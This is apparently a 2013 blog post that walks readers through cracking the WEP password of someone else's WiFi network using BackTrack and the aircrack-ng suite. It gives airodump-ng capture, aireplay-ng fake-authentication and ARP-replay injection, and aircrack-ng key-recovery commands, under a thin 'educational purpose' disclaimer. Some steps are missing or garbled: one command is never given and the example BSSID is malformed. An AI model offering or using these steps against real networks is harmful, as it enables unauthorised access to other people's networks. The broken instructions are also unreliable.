Tuesday, April 2, 2013

WiFi HACKING




Many WiFi users are protect them account by password.

Today we look about how to hack their WiFi  passwords.

***THIS POST ONLY FOR EDUCATIONAL PURPOSE.***

This hacking working on WEP protection method.

1. Connect the ALFA wireless protector in your computer.


















2. Download the BACKTRACK 3 and keep it in CD.

DOWNLOAD HERE



3. Insert the CD and boot your computer through the CD.
after the loading.......


A MENU is appearing on the screen,  select a 3rd option menu

Then select the command(black) icon in task menu.

then type this command in command box.

airmon-ng

then under the INTERFACE command line ra0 is appearing.
**NOTE THAT ra0 **

then type this commands in command box.

replace your INTERFACE in this 


press Ctrl+C , when your need network is come.

NOTE THIS ***
1. UNDER THE DATA
2. UNDER THE BSSID
3. UNDER THE ESSID
***

Then type this command.

airodump-ng -c (channel) -w (file
name) --bssid (bssid) (interface)

Example: airodump-ng -c 3 -w yoyo --bssid
60:23:88:2d:6f:of

After this action click the command button on the Task bar and open the new command box  and type this command .

aireplay-ng -1 0 -a (bssid) -h
00:11:22:33:44:55 -e (essid)
(interface)


then type this command.

aireplay-ng -3 -b (bssid) -h
00:11:22:33:44:55 (interface
)


after this all process, open 1st command box.
in that command box, under the DATA is it reached 10000.?

then type this command

aircrack-ng -b (bssid) (file
name-01.cap)


now wifi password is hacked.

ENJOY YOURSELF


No comments:

Post a Comment